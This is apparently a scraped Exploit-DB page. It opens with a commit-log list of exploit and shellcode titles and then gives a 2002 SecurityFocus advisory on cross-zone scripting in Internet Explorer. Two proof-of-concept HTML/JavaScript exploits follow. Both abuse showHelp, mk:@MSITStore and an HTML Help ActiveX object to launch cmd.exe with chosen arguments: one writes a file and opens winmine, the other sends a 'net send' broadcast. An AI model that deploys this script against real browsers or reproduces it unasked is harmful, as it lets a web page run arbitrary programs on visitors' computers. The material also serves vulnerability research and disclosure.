
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
72 lines
No EOL
2.7 KiB
HTML
72 lines
No EOL
2.7 KiB
HTML
source: https://www.securityfocus.com/bid/5841/info
|
|
|
|
A vulnerability has been reported in Microsoft Internet Explorer that may allow for remote attackers to execute script code in the context of other domains/security Zones. The cause appears to be a lack of access control checks when access to a document object is attempted through a saved reference to it. Exploitation of this vulnerability may allow for theft of cookie information, website impersonation or disclosure of local files.
|
|
|
|
It may also be possible to execute local programs with parameters through this vulnerability. Note that this may also be possible for attackers to do this with other, similar vulnerabilities that permit cross-zone scripting. See References and Exploits sections for details and proof of concept demonstration
|
|
|
|
<script>
|
|
// "How to execute programs with parameters in IE", 2002-11-06
|
|
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
|
|
prog = 'cmd';
|
|
args = '/k echo You are vulnerable (Sandblad #10) & '+
|
|
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
|
|
|
|
if (!location.hash) {
|
|
showHelp(location+"#1");
|
|
showHelp("iexplore.chm");
|
|
blur();
|
|
}
|
|
else if (location.hash == "#1")
|
|
open(location+"2").blur();
|
|
else {
|
|
f = opener.location.assign;
|
|
opener.location="res:";
|
|
f("javascript:location.replace('mk:@MSITStore:C:')");
|
|
setTimeout('run()',1000);
|
|
}
|
|
function run() {
|
|
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
|
|
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
|
|
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
|
|
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
|
|
"-00aa003b7a11><param name=Command value=Close></object>')");
|
|
f("javascript:c1.Click();c2.Click();");
|
|
close();
|
|
}
|
|
</script>
|
|
|
|
The following proof of concept was made available by Gert Fokkema <gert@why4.com>:
|
|
|
|
<HTML>
|
|
<BODY>
|
|
<script>
|
|
// "How to execute programs with parameters in IE", 2002-11-06
|
|
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
|
|
prog = 'cmd';
|
|
args = '/k net send * ..HELP..MY..COMPUTER..IS..HACKED..';
|
|
|
|
if (!location.hash) {
|
|
showHelp(location+"#1");
|
|
showHelp("iexplore.chm");
|
|
blur();
|
|
}
|
|
else if (location.hash == "#1")
|
|
open(location+"2").blur();
|
|
else {
|
|
f = opener.location.assign;
|
|
opener.location="res:";
|
|
f("javascript:location.replace('mk:@MSITStore:C:')");
|
|
setTimeout('run()',1000);
|
|
}
|
|
function run() {
|
|
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
|
|
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
|
|
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
|
|
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
|
|
"-00aa003b7a11><param name=Command value=Close></object>')");
|
|
f("javascript:c1.Click();c2.Click();");
|
|
close();
|
|
}
|
|
</script>
|
|
</BODY>
|
|
</HTML> |